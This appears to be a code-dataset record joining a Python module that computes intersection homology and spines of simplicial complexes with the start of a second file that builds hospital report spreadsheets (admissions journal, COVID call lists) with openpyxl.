for i in range(0,min(k+1,n+1)):
inter = inter + [[]]
for t in K[i]:
u = np.intersect1d(sorted(s),sorted(t)).tolist()
if (len(u) and not(inArray(sorted(u),inter[i])) and len(u)-1 == i):
inter[i].append(u)
return inter
###############################################################################
##########################INTERSECTION CHAIN COMPLEX###########################
###############################################################################
# Some common perversity functions
def TopP(k):
if k < 2:
return 0
else:
return k-2
def ZeroP(k):
return 0
def LowMidP(k):
if k < 2 :
return 0
else:
return floor((k-2)/2)
def UpMidP(k):
if k < 2:
return 0
else:
return floor((k-1)/2)
def minus(k):
return -1
# isProper decides whether or not a given simplex s is proper in the sense of
# corresponding to a simplicial chain that is transverse +- perversity
# Note: we allow a simplex to be proper even if it's boundary is not. The
# output is later on used to determine intersection chains.
def isProper(s, strata, p):
if (p == "0"):
p = ZeroP
if (p == "t"):
p = TopP
if (p == "m"):
p = LowMidP
if (p == "n"):
p = UpMidP
if (p == "-1"):
p = minus
j = len(s)-1
n = ComplexDimension(strata[0])
for i in range(1,len(strata)):
k = n - ComplexDimension(strata[i])
dimIntersection = ComplexDimension(ComplexIntersection(s,strata[i]))
if (dimIntersection > (j - k + p(k))):
return False
return True
# IS takes a simpl. cplx. C with specified stratification strata and a
# perversity p. It returns the simplices in C that are proper (in the above
# sense) and the ones that are not proper in two separate lists.
def IS(C,strata,p):
CP = []
CIP = []
for i in range(len(C)):
CP.append([])
CIP.append([])
for x in C[i]:
if isProper(x,strata,p):
CP[i].append(x)
else:
CIP[i].append(x)
return CP,CIP
# In the following we define some functions to perform a matrix reduction
# algorithm. This will be used to identify all simplicial intersection
# chains, also the non elementary ones.
def low(M,j):
col = np.nonzero(M[:,j])
if len(col[0]) == 0:
return -1
return np.where(M[:,j] == M[:,j][col[0]].min())[0].max()
# The input for the function MatrixReduction is a matrix M and an integer k.
# This routine executes elementary column transformations from left to right
# in order to eliminate nonzero entries below the row index k.
# The output includes the matrix M in reduced form and a lists columns whose
# entries below index k are all zero. This process works in Z/2Z only.
def MatrixReduction(M,k):
comb = []
for t in range(0,M.shape[1]):
comb.append([t])
ProperComb = []
stop = False
while not stop:
count = 0
for j in range(M.shape[1]-1,-1,-1):
if low(M,j) > k:
for i in range(j-1,-1,-1):
if low(M,i) == low(M,j) and low(M,j) > k:
M[:,j] = M[:,j]+M[:,i]
comb[j]= comb[j] + comb[i]
count = count+1
M = M%2
if count == 0:
stop = True
for j in range(0,M.shape[1]):
if low(M,j) <= k:
ProperComb.append(comb[j])
return M, ProperComb
# The function IC accepts a simpl. cplx. C, a stratification strata
# and a perversity p. The output includes the perversity p Intersection
# Chain Complex associated with the initial complex C. The filtration is
# specified by strata. Furthermore, IC also returns the Betti numbers of
# perversity p intersection homology.
def IC(C,strata,p):
CP, CIP = IS(C,strata,p)
n = len(CP)-1
ranks = [0]
# list for the resulting Intersection Chain Complex
ICC = []
for i in range(0,len(CP)):
ICC.append([])
for v in CP[0]:
ICC[0].append([v])
for i in range(n,0,-1):
ns1 = len(CP[i])
# Note: If there are no improper simplices in this dimension there is
# nothing to do
numImprop = len(CIP[i-1])
aC = CP[i-1] + CIP[i-1]
# Setting up the binary incidence matrix following the order in aC.
M = np.zeros((len(C[i-1]), ns1), dtype=int)
for j in range (0, ns1):
s = CP[i][j]
facets = []
for k in range (0, i+1):
f = s.copy()
del f[k]
facets = facets + [f]
for k in range (0, len(C[i-1])):
if aC[k] in facets:
M[k,j] = 1
redM = MatrixReduction(M,len(C[i-1])-1-numImprop)
# We determine the intersection chain complex with redM[1].
# The list redM[1] contains indices corresponding to the proper
# i-simplices that make as sum an allowable simpl. chain
for l in redM[1]:
c = []
for ind in l:
c.append(CP[i][ind])
ICC[i].append(c)
# Next, we calculate the Betti numbers via the rank of a reduced matrix
B = redM[0]
A = np.zeros((len(C[i-1]), ns1), dtype=int)
for j in range(0,B.shape[1]):
if low(B,j) <= len(C[i-1])-1-numImprop:
A[:,j] = B[:,j]
shapeA = np.shape(A)
if shapeA[0] == 0 or shapeA[1] == 0:
R = 0
else:
A_snf = SNF(A)
R = 0
for i in range(0,min(shapeA[0],shapeA[1])):
if A_snf[i,i] == 1:
R = R+1
ranks.append(R)
ranks.append(0)
ranks = ranks[::-1]
BettiNumbers = []
n = len(ICC)
for i in range(n):
Betti = len(ICC[i])-ranks[i]-ranks[i+1]
BettiNumbers.append(Betti)
return ICC, BettiNumbers
# Auxiliary function to check whether or not a given simpl. cplx. represents a
# pseudomanifold
def isPseudomanifold(C):
n = ComplexDimension(C)
countlist = []
for i in range(0,n):
for s in C[i]:
count = 0
for t in C[n]:
if len(SimplexIntersection(s,t))==len(s):
count = count +1
if count == 0:
return False
if i == n-1:
countlist.append(count)
if count != 2:
return [False,countlist]
return True
###############################################################################
###################SIMPLICIAL COMPLEXES FROM POINT CLOUDS######################
###############################################################################
# DelVR complex, compare do DelCech complex as in Bauer & Edelsbrunner 2017.
# Currently restricted to point clouds xyz of dimension <= 3.
# We employed the function Delaunay from the scipy.spatial package to realize
# Delaunay triangulations.
def DelaunayComplex(xyz,r):
    """Delaunay-Vietoris-Rips complex of the point cloud ``xyz`` at scale r.

    Compare the DelCech complex of Bauer & Edelsbrunner (2017): the Delaunay
    triangulation is computed first (via scipy.spatial.Delaunay) and then
    only those simplices are kept whose vertices lie pairwise within
    distance 2*r of each other.  Only point clouds of dimension 2 or 3 are
    supported.

    :param xyz: list of points, each a list of 2 or 3 coordinates
    :param r: scale parameter; a simplex is kept when r >= diameter/2
    :return: [vertices, edges, triangles, tetrahedra]
    """
    dim = len(xyz[0])
    points = np.array(xyz)
    vertices = [[v] for v in range(len(xyz))]
    edges = []
    triangles = []
    tetrahedra = []
    simplices = Delaunay(xyz).simplices

    def dedup(simplex_list):
        # Drop duplicate simplices via a tuple/set round trip.
        return [list(t) for t in set(tuple(s) for s in simplex_list)]

    if dim == 2:
        del_triangles = simplices
        del_edges = []
        for row in del_triangles:
            row.sort()
            del_edges.append(list([row[0], row[1]]))
            del_edges.append(list([row[0], row[2]]))
            del_edges.append(list([row[1], row[2]]))
        del_edges = dedup(del_edges)
    if dim == 3:
        del_tetrahedra = simplices
        del_triangles = []
        for row in del_tetrahedra:
            row.sort()
            del_triangles.append(list([row[0], row[1], row[2]]))
            del_triangles.append(list([row[0], row[1], row[3]]))
            del_triangles.append(list([row[0], row[2], row[3]]))
            del_triangles.append(list([row[1], row[2], row[3]]))
        del_triangles = dedup(del_triangles)
        del_edges = []
        for tri in del_triangles:
            del_edges.append(list([tri[0], tri[1]]))
            del_edges.append(list([tri[0], tri[2]]))
            del_edges.append(list([tri[1], tri[2]]))
        del_edges = dedup(del_edges)
    # Keep a Delaunay simplex exactly when its diameter is at most 2*r.
    for a, b in del_edges:
        if r >= norm(points[a] - points[b]) / 2:
            edges.append([a, b])
    for tri in del_triangles:
        a, b, c = tri[0], tri[1], tri[2]
        diameter = max(norm(points[b] - points[c]),
                       norm(points[a] - points[b]),
                       norm(points[a] - points[c]))
        if r >= diameter / 2:
            triangles.append([a, b, c])
    if dim == 3:
        for tet in del_tetrahedra:
            a, b, c, d = tet[0], tet[1], tet[2], tet[3]
            diameter = max(norm(points[a] - points[b]),
                           norm(points[a] - points[c]),
                           norm(points[a] - points[d]),
                           norm(points[b] - points[c]),
                           norm(points[b] - points[d]),
                           norm(points[c] - points[d]))
            if r >= diameter / 2:
                tetrahedra.append([a, b, c, d])
    return [vertices, edges, triangles, tetrahedra]
# The function VRComplex calculates the Vietoris-Rips complex of a
# point cloud xyz for the radius r. Currently the complex is restricted
# to dimension 3.
def VRComplex(xyz,r):
    """Vietoris-Rips complex of the point cloud ``xyz`` for radius r.

    Two points are connected when their distance is strictly below the
    diameter 2*r; higher simplices are filled in whenever all pairwise
    distances are below the diameter.  The construction is restricted to
    dimension 3 (vertices, edges, triangles, tetrahedra).

    :param xyz: list of points (lists of coordinates)
    :param r: radius; simplices use the strict threshold distance < 2*r
    :return: [VR0S, VR1S, VR2S, VR3S]
    """
    n_points = len(xyz)
    points = [np.array(p) for p in xyz]
    diameter = 2 * r
    vr0 = [[v] for v in range(n_points)]
    # Edges: every pair strictly closer than the diameter.
    vr1 = []
    for a in range(n_points):
        for b in range(a + 1, n_points):
            if norm(points[a] - points[b]) < diameter:
                vr1.append([a, b])
    # Triangles: extend each edge by any third vertex close to both ends.
    vr2 = []
    for edge in vr1:
        a, b = edge[0], edge[1]
        for v in range(n_points):
            if v == a or v == b:
                continue
            if norm(points[v] - points[a]) < diameter and norm(points[v] - points[b]) < diameter:
                # Sort so the simplex is oriented (vertices ascending).
                vr2.append(sorted([v, a, b]))
    # Remove duplicate triangles produced from different edges.
    vr2 = [list(t) for t in set(tuple(s) for s in vr2)]
    # Tetrahedra: extend each triangle by a fourth vertex close to all three.
    # Quadratic in the number of data points / 2-simplices.
    vr3 = []
    for tri in vr2:
        a, b, c = tri[0], tri[1], tri[2]
        for v in range(n_points):
            if v == a or v == b or v == c:
                continue
            if (norm(points[v] - points[a]) < diameter
                    and norm(points[v] - points[b]) < diameter
                    and norm(points[v] - points[c]) < diameter):
                vr3.append(sorted([v, a, b, c]))
    vr3 = [list(t) for t in set(tuple(s) for s in vr3)]
    return [vr0, vr1, vr2, vr3]
###############################################################################
###############################(LAYERED) SPINES################################
###############################################################################
# Auxillary function to check if a given simplex t is principal in a simpl.
# cplx. C
def isPrincipal(C,t):
    """Check whether the simplex t is principal in the complex C.

    A simplex is principal when it is not a proper face of any simplex of
    one dimension higher.  Top-dimensional simplices are always principal.

    :param C: simplicial complex as a list of skeleta
    :param t: simplex (sorted vertex list)
    :return: True if t is principal, else False
    """
    k = len(t)-1
    if k == ComplexDimension(C):
        return True
    for s in C[k+1]:
        # t is a face of s exactly when their intersection is all of t.
        # BUG FIX: the original compared the int len(...) with the list t
        # itself (always False), so every simplex was reported principal.
        if len(SimplexIntersection(s,t)) == len(t):
            return False
    return True
# Princ will take a simpl. cplx. C and a simplex s of C.
# The output is the set of principal cofaces of s in C
def Princ(C,s):
    """Return the principal cofaces of the simplex s in the complex C.

    The scan aborts with [] as soon as a second coface of s is found, i.e.
    a nonempty result is only possible when s has exactly one coface (the
    free-face condition used by the collapse routines).
    """
    n = ComplexDimension(C)
    k = len(s)-1
    if k == n:
        # Top-dimensional simplices have no cofaces.
        return []
    cofaces_seen = 0
    principal = []
    for candidate in C[k+1]:
        # `candidate` is a coface of s iff their intersection has dimension k.
        if len(SimplexIntersection(s,candidate))-1 != k:
            continue
        cofaces_seen += 1
        if cofaces_seen > 1:
            return []
        if isPrincipal(C,candidate):
            principal.append(candidate)
    return principal
# isAdmissable is an auxiliary function to check the extra condition for an
# intermediate collapse to be elementary
def isAdmissible(s,p,S):
    """Extra condition for an intermediate collapse to be elementary.

    Every face of p lying in S must intersect s in a proper, nonempty face;
    if any such face is disjoint from s or contains all of s, the collapse
    of (s, p) is rejected.
    """
    for part in ComplexIntersection(p,S):
        for face in part:
            overlap = len(SimplexIntersection(face,s))
            if overlap == 0 or overlap == len(s):
                return False
    return True
# Function to realise a Collapse. Only applied if condition for an elementary
# collapse are fulfilled.
def ElemCollapse(C,s,p):
    """Perform an elementary collapse, removing the free face s together
    with its unique principal coface p.

    The complex C is mutated in place and also returned; the caller must
    have verified the elementary-collapse conditions beforehand.
    """
    coface_dim = len(p) - 1
    C[coface_dim].remove(p)
    C[coface_dim - 1].remove(s)
    return C
# The Function Spine computes the layered spine of a given Simpl. Cplx.(Cplx)
# with resp. to S0 and C0. If one of them is empty (this has to be specified)
# the result will be a spine of Cplx in the usual sense.
def Spine(Cplx, S0 , C0):
    """Compute the layered spine of the simplicial complex ``Cplx``.

    The complex is simplified by repeated elementary collapses in four
    phases: collapses within S, within C, on the "intermediate" simplices
    IM (those whose vertices lie partly in S0 and partly in C0), and a
    final pass within C again.  If S0 or C0 is empty the result is a spine
    of Cplx in the usual sense.

    :param Cplx: simplicial complex (list of skeleta, each a list of simplices)
    :param S0: sub-complex (possibly empty) guiding the first collapse phase
    :param C0: sub-complex (possibly empty) guiding the second collapse phase
    :return: the collapsed deep copy of Cplx
    """
    # We create deep copies to not change the input
    # Note: This doubles the required memory
    K = copy.deepcopy(Cplx)
    n = ComplexDimension(K)
    S = copy.deepcopy(S0)
    C = copy.deepcopy(C0)
    IM = [[]]
    for i in range(1,n+1):
        # Every increment will add a list to S, C and IM to be the i-th Skeleton
        S = S + [[]]
        C = C + [[]]
        IM = IM + [[]]
        for t in K[i]:
            # Here we check if all vertices of a simplex t lie in S, C, or partly
            # in both (i.e. in IM).
            # NOTE(review): the intersection is taken against the ORIGINAL
            # S0/C0 rather than the growing S/C — presumably intentional since
            # only the input vertex sets matter here; confirm against callers.
            if ComplexDimension(S) >= 0:
                a = len(ComplexIntersection(t,S0)[0])
            else:
                # Sentinel that can never equal len(t).
                a = -100
            if ComplexDimension(C) >= 0:
                b = len(ComplexIntersection(t,C0)[0])
            else:
                b = -100
            if a == len(t):
                S[i].append(t)
            if b == len(t):
                C[i].append(t)
            if a != len(t) and b!=len(t):
                IM[i].append(t)
    # Phase 1: S-Collapses.
    stop = False
    # After the execution of an ElemCollapse we have to go through the
    # remaining simplices because simplices can become free after a collapse.
    while not stop:
        count = 0
        for i in range(min(ComplexDimension(K)-1,ComplexDimension(S)-1),-1,-1):
            # Creating a copy of S to iterate over, since S is mutated below.
            Scopy = copy.deepcopy(S)
            for s in Scopy[i]:
                # We search the i-th skeleton for free faces
                princ_s = Princ(K,s)
                # s is free if there is exactly one princ coface and none other;
                # princ_s either contains the unique principal coface of s
                # (if s is free) or it is an empty list.
                if len(princ_s) == 1:
                    if princ_s[0] in S[i+1]:
                        K = ElemCollapse(K,s,princ_s[0])
                        S = ElemCollapse(S,s,princ_s[0])
                        count = count +1
        # If no collapse has been executed we are done and break the while-loop
        if count == 0:
            stop = True
    # Phase 2: C-Collapses.
    stop = False
    while not stop:
        count = 0
        for i in range(min(ComplexDimension(K)-1,ComplexDimension(C)-1),-1,-1):
            Ccopy = copy.deepcopy(C)
            for c in Ccopy[i]:
                princ_c = Princ(K,c)
                if len(princ_c) == 1:
                    if princ_c[0] in C[i+1]:
                        K = ElemCollapse(K,c,princ_c[0])
                        C = ElemCollapse(C,c,princ_c[0])
                        count = count +1
        if count == 0:
            stop = True
    # Phase 3: Intermediate-Collapses.
    stop = False
    while not stop:
        count = 0
        for j in range(min(ComplexDimension(K)-1,ComplexDimension(IM)-1),-1,-1):
            IMcopy = copy.deepcopy(IM)
            # NOTE: here `i` is a simplex from the intermediate list, not an
            # integer index as in the loops above.
            for i in IMcopy[j]:
                princ_i = Princ(K,i)
                if len(princ_i) == 1:
                    # Note: we have to check an extra condition for
                    # intermediate collapses to be elementary
                    if isAdmissible(i, princ_i[0], S):
                        K = ElemCollapse(K,i,princ_i[0])
                        IM = ElemCollapse(IM,i,princ_i[0])
                        count = count + 1
        if count == 0:
            stop = True
    # Phase 4: C-Collapses again — deliberately repeated, since intermediate
    # collapses may have freed further faces of C.
    stop = False
    while not stop:
        count = 0
        for i in range(min(ComplexDimension(K)-1,ComplexDimension(C)-1),-1,-1):
            Ccopy = copy.deepcopy(C)
            for c in Ccopy[i]:
                princ_c = Princ(K,c)
                if len(princ_c) == 1:
                    if princ_c[0] in C[i+1]:
                        K = ElemCollapse(K,c,princ_c[0])
                        C = ElemCollapse(C,c,princ_c[0])
                        count = count +1
        if count == 0:
            stop = True
    return K
|
en
| 0.596168
|
# Floor functions is used for certain perversity functions # Delaunay triangulation used to generate Delaunay-Vietoris-Rips complexes ############################################################################### ###########################Z/2Z SMITH NORMAL FORM############################## ############################################################################### ############################################################################### ########################SIMPLICIAL OPERATIONS################################## ############################################################################### #Computing the dimension of a simpl. cplx. # SimplexIntersections returns the "largest" face of given simpl. s and t # function tests whether a simplex is contained in a simpl. cplx or not # ComplexIntersection returns a list of simplices (not a complex but in a # similar format) of the simplices in the simpl. cplx. K that are faces of the # simplex s. The special format of the output allows us to apply the function # ComplexDimension to it. ############################################################################### ##########################INTERSECTION CHAIN COMPLEX########################### ############################################################################### # Some common perversity functions # isProper decides whether or not a given simplex s is proper in the sense of # corresponding to a simplicial chain that is transverse +- perversity # Note: we allow a simplex to be proper even if it's boundary is not. The # output is later on used to determine intersection chains. # IS takes a simpl. cplx. C with specified stratification strata and a # perversity p. It returns the simplices in C that are proper (in the above # sense) and the ones that are not proper in two separate lists. # In the following we define some functions to perform a matrix reduction # algorithm. 
This will be used to identify all simplicial intersection # chains, also the non elementary ones. # The input for the function MatrixReduction is a matrix M and an integer k. # This routine executes elementary column transformations from left to right # in order to eliminate nonzero entries below the row index k. # The output includes the matrix M in reduced form and a lists columns whose # entries below index k are all zero. This process works in Z/2Z only. # The function IC accepts a simpl. cplx. C, a stratification strata # and a perversity p. The output includes the perversity p Intersection # Chain Complex associated with the initial complex C. The filtration is # specified by strata. Furthermore, IC also returns the Betti numbers of # perversity p intersection homology. # list for the resulting Intersection Chain Complex # Note: If there are no improper simplices in this dimension there is # nothing to do # Setting up the binary incidence matrix following the order in aC. # We determine the intersection chain complex with redM[1]. # The list redM[1] contains indices corresponding to the proper # i-simplices that make as sum an allowable simpl. chain # Next, we calculate the Betti numbers via the rank of a reduced matrix # Auxiliary function to check whether or not a given simpl. cplx. represents a # pseudomanifold ############################################################################### ###################SIMPLICIAL COMPLEXES FROM POINT CLOUDS###################### ############################################################################### # DelVR complex, compare do DelCech complex as in Bauer & Edelsbrunner 2017. # Currently restricted to point clouds xyz of dimension <= 3. # We employed the function Delaunay from the scipy.spatial package to realize # Delaunay triangulations. # First we construct Delaunay triangulation and then select simplices # whose vertices lie pairwise closer than distance r to each other. 
# DelE may contain duplicate simplices. So we need to remove these # duplicates: # The function VRComplex calculates the Vietoris-Rips complex of a # point cloud xyz for the radius r. Currently the complex is restricted # to dimension 3. # Build a 2-simplex s2 with vertices i,j,k: # s2 need not be an >oriented< 2-simplex; we first # need to sort the vertices in ascending order: # add the oriented 2-simplex s2 to the # Vietoris-Rips complex: # VR2S may contain duplicate simplices. So we need to remove these # duplicates: # We compute the 3-simplices of the Vietoris-Rips complex. # This operation is quadratic in the number of data points/2-simplices. # s2 ranges over all 2-simplices: # Build a 3-simplex s3 with vertices i,j,k,l: # s3 need not be an >oriented< 3-simplex; we first # need to sort the vertices in ascending order: # add the oriented 3-simplex s3 to the # Vietoris-Rips complex: ############################################################################### ###############################(LAYERED) SPINES################################ ############################################################################### # Auxillary function to check if a given simplex t is principal in a simpl. # cplx. C # Princ will take a simpl. cplx. C and a simplex s of C. # The output is the set of principal cofaces of s in C # isAdmissable is an auxiliary function to check the extra condition for an # intermediate collapse to be elementary # Function to realise a Collapse. Only applied if condition for an elementary # collapse are fulfilled. # The Function Spine computes the layered spine of a given Simpl. Cplx.(Cplx) # with resp. to S0 and C0. If one of them is empty (this has to be specified) # the result will be a spine of Cplx in the usual sense. 
# We create deep copies to not change the input # Note: This doubles the required memory # Every increment will add a list to S, C and IM to be the i-th Skeleton # Here we check if all vertices of a simplex t lie in S, C, or partly # in both (i.e. in IM) #S-Collapse # After the execution of an ElemCollapse we have to go through the # remaining simplices because simplices can become free after a collapse. # Creating a copy of S to iterate over # We search the i-th skeleton for free faces # s is free if there is exactly one princ coface and none other # princ_s either contains the unique principal coface of s # if s is free or it is an empty list # If no collapse has been executed we are done and break the while-loop #C-Collapses #Intermediate-Collapses # Note: we have to check an extra condition for # intermediate collapses to be elementary #C-Collapses
| 3.102221
| 3
|
statistic/structure_sheet.py
|
VoprosiKira/l2
| 0
|
6628078
|
<gh_stars>0
import json
from collections import OrderedDict
import openpyxl
from openpyxl.styles import Border, Side, Alignment, Font, NamedStyle
from openpyxl.utils.cell import get_column_letter
from directions.models import IstochnikiFinansirovaniya
from doctor_call.models import DoctorCall
from hospitals.tfoms_hospital import HOSPITAL_TITLE_BY_CODE_TFOMS
from utils.dates import normalize_dash_date
from dateutil.parser import parse as du_parse
from dateutil.relativedelta import relativedelta
month_dict = {1: 'Январь', 2: 'Февраль', 3: 'Март', 4: 'Апрель', 5: 'Май', 6: 'Июнь', 7: 'Июль', 8: 'Август', 9: 'Сентябрь', 10: 'Октябрь', 11: 'Ноябрь', 12: 'Декабрь'}
def job_total_base(ws1, month, type_fin):
    """Lay out the skeleton of the totals sheet.

    Writes the month name, finance-source title, the 'work type' caption
    and one numbered column per day (1-31) into the worksheet.

    :param ws1: target worksheet
    :param month: month number (1-12), looked up in month_dict
    :param type_fin: primary key of the IstochnikiFinansirovaniya record
    :return: the same worksheet
    """
    ws1.column_dimensions[get_column_letter(1)].width = 22
    for day in range(1, 32):
        column = day + 1
        ws1.column_dimensions[get_column_letter(column)].width = 4
        ws1.cell(row=4, column=column).value = str(day)
    ws1.cell(row=1, column=1).value = 'Месяц'
    ws1.cell(row=1, column=2).value = month_dict.get(month)
    ws1.cell(row=4, column=1).value = 'Вид работы'
    finance_source = IstochnikiFinansirovaniya.objects.get(pk=type_fin)
    ws1.cell(row=2, column=1).value = finance_source.title
    return ws1
def jot_total_titles(ws1, titles):
    """Write the work-type titles into column 1, starting at row 5.

    :param ws1: target worksheet
    :param titles: sequence of work-type titles
    :return: the worksheet and an ordered mapping title -> row number
    """
    title_rows = OrderedDict()
    for offset, title in enumerate(titles):
        row = 5 + offset
        ws1.cell(row=row, column=1).value = title
        title_rows[title] = row
    return ws1, title_rows
def job_total_data(ws1, titles, data):
    """Fill the per-day UET values into the totals sheet.

    :param ws1: worksheet prepared by job_total_base / jot_total_titles
    :param titles: mapping work-type title -> row number (from jot_total_titles)
    :param data: mapping day number -> {work-type title: uet value}
    :return: the worksheet (added for consistency with the sibling helpers,
        which all return ws1; callers that ignored the old None still work)
    """
    for day, per_title in data.items():
        for title, uet in per_title.items():
            row = titles.get(title)
            # NOTE(review): a title missing from `titles` yields row=None and
            # would fail inside openpyxl — presumably callers guarantee that
            # every title was registered by jot_total_titles; confirm.
            ws1.cell(row=row, column=day + 1).value = str(uet)
    return ws1
def passed_research_base(ws1, data_date):
    """Build the header of the admissions/refusals journal sheet.

    :param ws1: target worksheet
    :param data_date: period string interpolated into the sheet title
    :return: the worksheet with title row, column captions and widths set
    """
    thin = Side(style='thin', color="000000")
    header_style = NamedStyle(name="style_border")
    header_style.border = Border(left=thin, top=thin, right=thin, bottom=thin)
    header_style.font = Font(bold=True, size=11)
    header_style.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
    ws1.merge_cells(start_row=1, start_column=1, end_row=1, end_column=19)
    ws1.cell(row=1, column=1).value = 'ЖУРНАЛ учета приема и отказов в госпитализации за ' + data_date + 'г.(мед.документация Ф№001/У утв. МИНЗДРАВОМ СССР 04.10.1980г. №1030)'
    ws1.cell(row=1, column=1).style = header_style
    # Cell geometry: tall caption row.
    ws1.row_dimensions[2].height = 115
    columns = [
        ('№ п/п', 5),
        ('Время поступления', 8),
        ('Услуга (дата-время подтверждения)', 14),
        ('Направление', 11),
        ('Фамилия, имя, отчество больного', 20),
        ('Дата рождения', 10),
        ('Постоянное место жительства или адрес родственников, близких и N телефона', 23),
        ('Каким учреждением был направлен или доставлен', 15),
        ('Отделение, в которое помещен больной', 12),
        ('N карты (стационарного) больного', 10),
        ('Диагноз направившего учреждения', 7),
        ('Диагноз при поступлении', 7),
        ('№ ДДУ', 16),
        ('Полис', 21),
        ('Примечания', 10),
        ('Выписан, переведен в другой стационар, умер (вписать и указать дату и название стационара, куда переведен', 20),
        ('Отметка о сообщении родственникам или учреждению', 11),
        ('Если не был госпитализирован указать причину и принятые меры', 11),
        ('отказ в приеме первичный, повторный (вписать)', 11),
    ]
    for idx, (caption, width) in enumerate(columns, 1):
        header = ws1.cell(row=2, column=idx)
        header.value = caption
        ws1.column_dimensions[get_column_letter(idx)].width = width
        header.style = header_style
    return ws1
def passed_research_data(ws1, data):
    """Fill the admissions/refusals journal rows (header built by
    passed_research_base).

    Each element of ``data`` is an indexable record; the field layout
    observed from the indices used below: 1 service title, 2 policy number,
    3 policy issuer, 4 direction number, 5 confirmation date-time,
    6 direction creation date, 7 diagnosis, 8 result, 9 direction time,
    10 card number, 11/12/13 surname/name/patronymic, 14 birthday,
    15 main address, 16 actual address, 17 workplace, 18 referrer.

    :return: the worksheet
    """
    r = 2
    n = 0
    empty = ' '
    style_border1 = NamedStyle(name="style_border1")
    bd = Side(style='thin', color="000000")
    style_border1.border = Border(left=bd, top=bd, right=bd, bottom=bd)
    style_border1.font = Font(bold=False, size=11)
    style_border1.alignment = Alignment(wrap_text=True, horizontal='left', vertical='center')
    for i in data:
        current_research_title = i[1]
        current_polis_n = i[2] or empty
        current_polis_who_give = i[3] or empty
        current_napravlen = i[4]
        current_datatime_confirm = i[5]
        current_create_napr = i[6]
        current_diagnoz = i[7] or empty
        current_result = i[8] or empty
        # BUG FIX: this field lives at index 9 — the only index the original
        # skipped; i[19] was an off-by-ten typo.
        current_napr_time_at = i[9] or empty
        current_num_card = i[10]
        current_family = i[11] or empty
        current_name = i[12] or empty
        current_patronymic = i[13] or empty
        current_birthday = i[14] or empty
        current_main_address = i[15] if i[15] else ''
        current_fact_address = i[16] if i[16] else empty
        current_address = current_main_address if current_main_address else current_fact_address
        current_work_place = i[17] or empty
        current_kem_napravlen = i[18] or empty
        r = r + 1
        n = n + 1
        ws1.cell(row=r, column=1).value = n
        ws1.cell(row=r, column=2).value = current_napr_time_at
        ws1.cell(row=r, column=3).value = f'{current_research_title},\n({current_datatime_confirm})'
        ws1.cell(row=r, column=4).value = f'{current_napravlen},\n({current_create_napr})'
        ws1.cell(row=r, column=5).value = current_family + ' ' + current_name + ' ' + current_patronymic
        ws1.cell(row=r, column=6).value = current_birthday
        ws1.cell(row=r, column=7).value = current_address
        ws1.cell(row=r, column=8).value = current_kem_napravlen
        ws1.cell(row=r, column=9).value = 'Приемное'
        ws1.cell(row=r, column=10).value = current_num_card
        ws1.cell(row=r, column=11).value = ' '
        ws1.cell(row=r, column=12).value = current_diagnoz
        ws1.cell(row=r, column=13).value = current_work_place
        ws1.cell(row=r, column=14).value = current_polis_n + ', ' + current_polis_who_give
        ws1.cell(row=r, column=15).value = ' '
        ws1.cell(row=r, column=16).value = current_result
        ws1.cell(row=r, column=17).value = ' '
        ws1.cell(row=r, column=18).value = ' '
        ws1.cell(row=r, column=19).value = ' '
        for j in range(1, 20):
            ws1.cell(row=r, column=j).style = style_border1
    return ws1
def covid_call_patient_base(ws1):
    """Build the header of the COVID call-back ('Обзвон') sheet.

    :param ws1: target worksheet
    :return: the worksheet with title, captions and column widths set
    """
    thin = Side(style='thin', color="000000")
    header_style = NamedStyle(name="style_border")
    header_style.border = Border(left=thin, top=thin, right=thin, bottom=thin)
    header_style.font = Font(bold=True, size=11)
    header_style.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
    ws1.merge_cells(start_row=1, start_column=1, end_row=1, end_column=19)
    ws1.cell(row=1, column=1).value = 'Обзвон'
    ws1.cell(row=1, column=1).style = header_style
    # Cell geometry.
    ws1.row_dimensions[2].height = 15
    columns = [
        ('ФИО', 25),
        ('№ карты', 15),
        ('Телефон', 20),
        ('Оператор', 25),
        ('Дата', 25),
    ]
    for idx, (caption, width) in enumerate(columns, 1):
        header = ws1.cell(row=2, column=idx)
        header.value = caption
        ws1.column_dimensions[get_column_letter(idx)].width = width
        header.style = header_style
    return ws1
def covid_call_patient_data(ws1, data):
    """Fill the call-back list rows starting at row 3.

    :param ws1: worksheet prepared by covid_call_patient_base
    :param data: iterable of dicts with keys "fio_patient", "number",
        "Контактный телефон", "Оператор", "Дата следующего звонка"
    :return: the worksheet
    """
    r = 3
    style_border1 = NamedStyle(name="style_border1")
    bd = Side(style='thin', color="000000")
    style_border1.border = Border(left=bd, top=bd, right=bd, bottom=bd)
    style_border1.font = Font(bold=False, size=11)
    style_border1.alignment = Alignment(wrap_text=True, horizontal='left', vertical='center')
    for i in data:
        ws1.cell(row=r, column=1).value = i["fio_patient"]
        ws1.cell(row=r, column=2).value = i["number"]
        ws1.cell(row=r, column=3).value = i["Контактный телефон"]
        ws1.cell(row=r, column=4).value = i["Оператор"]
        ws1.cell(row=r, column=5).value = normalize_dash_date(i["Дата следующего звонка"])
        for j in range(1, 6):
            ws1.cell(row=r, column=j).style = style_border1
        # BUG FIX: the row counter never advanced, so every record overwrote
        # row 3 (compare covid_swab_data, which increments r per record).
        r += 1
    return ws1
def covid_swab_base(ws1):
    """Build the header of the repeat-swab ('Повторный мазок') sheet.

    :param ws1: target worksheet
    :return: the worksheet with title, captions and column widths set
    """
    thin = Side(style='thin', color="000000")
    header_style = NamedStyle(name="style_border")
    header_style.border = Border(left=thin, top=thin, right=thin, bottom=thin)
    header_style.font = Font(bold=True, size=11)
    header_style.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
    ws1.merge_cells(start_row=1, start_column=1, end_row=1, end_column=19)
    ws1.cell(row=1, column=1).value = 'Повторный мазок'
    ws1.cell(row=1, column=1).style = header_style
    # Cell geometry.
    ws1.row_dimensions[2].height = 15
    columns = [
        ('ФИО', 25),
        ('№ карты', 15),
        ('Телефон', 20),
        ('Оператор', 25),
        ('Дата', 25),
        ('Адрес', 55),
    ]
    for idx, (caption, width) in enumerate(columns, 1):
        header = ws1.cell(row=2, column=idx)
        header.value = caption
        ws1.column_dimensions[get_column_letter(idx)].width = column[1] if False else width
        header.style = header_style
    return ws1
def covid_swab_data(ws1, data):
    """Fill the repeat-swab rows starting at row 3.

    :param ws1: worksheet prepared by covid_swab_base
    :param data: iterable of dicts with keys "fio_patient", "number",
        "Контактный телефон", "Оператор",
        "Сдача повторного мазка на COVID", "Адрес"
    :return: the worksheet
    """
    r = 3
    style_border1 = NamedStyle(name="style_border1")
